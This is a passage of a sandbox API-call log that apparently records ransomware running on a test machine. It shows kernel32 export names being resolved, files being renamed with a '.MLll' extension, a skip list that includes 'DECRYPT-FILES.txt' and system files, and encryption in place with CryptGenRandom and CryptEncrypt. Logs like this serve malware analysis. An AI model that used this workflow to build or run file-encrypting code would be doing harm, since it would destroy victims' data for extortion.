returned="CreateMailslotA" [0077.065] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.065] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.065] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.065] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.065] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.065] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.065] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.065] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.065] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.065] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.065] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.065] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.065] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.066] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.066] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.066] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.066] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.066] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.066] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.066] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.066] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.066] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.066] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.066] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.066] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.066] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.066] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.066] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.066] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.066] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.066] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.066] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.066] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.067] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.067] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.067] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.067] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.067] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.067] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.067] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.067] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.067] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.067] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.067] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.067] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.067] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.067] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.067] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.067] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.067] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.067] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.067] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.068] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.068] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.068] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.068] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.068] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.068] lstrlenA (lpString="DELETEATOM") returned 10 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.068] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.068] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.068] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.068] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.068] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.068] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.068] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.068] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.068] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.068] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.068] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.068] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.068] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.068] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.069] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.069] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.069] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.069] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.069] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.069] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.069] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.069] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.069] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.069] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.069] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.069] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.069] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.069] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.069] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.069] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.069] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.069] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.069] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.070] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.070] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.070] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.070] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.070] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.070] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.070] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.070] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.070] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.070] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.070] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.070] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif") returned 63 [0077.070] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif.MLll") returned 68 [0077.070] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dnj0jh17ylgw1.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DNJ0jH17yLgW1.gif.MLll" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dnj0jh17ylgw1.gif.mlll"), dwFlags=0x0) returned 1 [0077.071] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.071] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.071] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.072] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecc3fb80, ftCreationTime.dwHighDateTime=0x1d4d3e7, ftLastAccessTime.dwLowDateTime=0xeed3cfd0, ftLastAccessTime.dwHighDateTime=0x1d4d212, ftLastWriteTime.dwLowDateTime=0xeed3cfd0, ftLastWriteTime.dwHighDateTime=0x1d4d212, nFileSizeHigh=0x0, nFileSizeLow=0xb433, dwReserved0=0x0, dwReserved1=0x0, cFileName="ebf4.png", cAlternateFileName="")) returned 1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="DECRYPT-FILES.txt") returned 1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="autorun.inf") returned 1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="boot.ini") returned 1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="desktop.ini") returned 1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="ntuser.dat") returned -1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="iconcache.db") returned -1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="bootsect.bak") returned 1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="ntuser.dat.log") returned -1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="thumbs.db") returned -1 [0077.072] lstrcmpiW (lpString1="ebf4.png", lpString2="Bootfont.bin") returned 1 [0077.072] lstrlenW (lpString="ebf4.png") returned 8 [0077.072] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0077.072] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0077.072] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0077.072] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0077.072] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.072] lstrlenW (lpString="ebf4.png") returned 8 [0077.072] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.072] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ebf4.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png" [0077.072] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ebf4.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.073] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=46131) returned 1 [0077.073] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.073] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.073] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.073] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.073] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.073] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.073] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.074] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.074] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.075] CloseHandle (hObject=0x444) returned 1 [0077.075] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.075] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.076] CloseHandle (hObject=0x0) returned 0 [0077.076] CloseHandle (hObject=0x440) returned 1 